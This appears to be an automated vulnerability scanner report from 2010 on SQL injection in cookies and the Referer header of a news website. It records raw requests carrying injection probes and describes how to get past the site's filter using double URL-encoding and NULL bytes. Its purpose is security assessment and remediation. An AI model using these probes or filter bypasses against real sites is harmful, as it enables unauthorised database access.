GET /nation-world/ci_16796747 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/nation-world/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /nation-world/ci_16797757 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LUCKNOW, India—Police were questioning two brothers for their alleged involvement in ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /nation-world/ci_16797757 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/nation-world/ci_16797757?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:43:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:43:19 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 447
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /news/ci_16800002 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Santa Clara County Board of Supervisors voted unanimously to cap the unused days of vac ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /news/ci_16800002 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/news/ci_16800002?ncl ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the currBrandCheck cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /opinion/ci_16791987 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'%20and%201%3d1--%20; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 1 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16791987?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:43:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:43:48 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16791987?nclick_check=1&forced=true">here</a>.</p> <hr> <address>Apache/2.0.52 (Red Hat) Server at www.mercurynews.com Port 80</address> </body></html>
Request 2
GET /opinion/ci_16791987 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'%20and%201%3d2--%20; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='How often has some government authority told us "We cant do it," but the public persisted and it got done after all?'><meta name="keywords" content="opinion editorials letters to the editor steve wright"/><title>Opinion: Keep digging for San Jose's best high-speed rail options - San Jose Mercury News</title><script language="JavaScript"> document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); </script>
<script src="http://extras.mnginteractive.com/live/js/Brightcove/MercuryNews/MobileCompatibility.js"></script> <Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "mercurynews.Opinion.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmai ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:08 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:16 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1'; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1''; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:54 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%00'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Day 1 for the 28 first-term members of the Assembly and 10 members of the Senate who were s ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /opinion/ci_16792028 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true%00''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/opinion/ci_16792028?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:28 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /opinion/ci_16798841 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
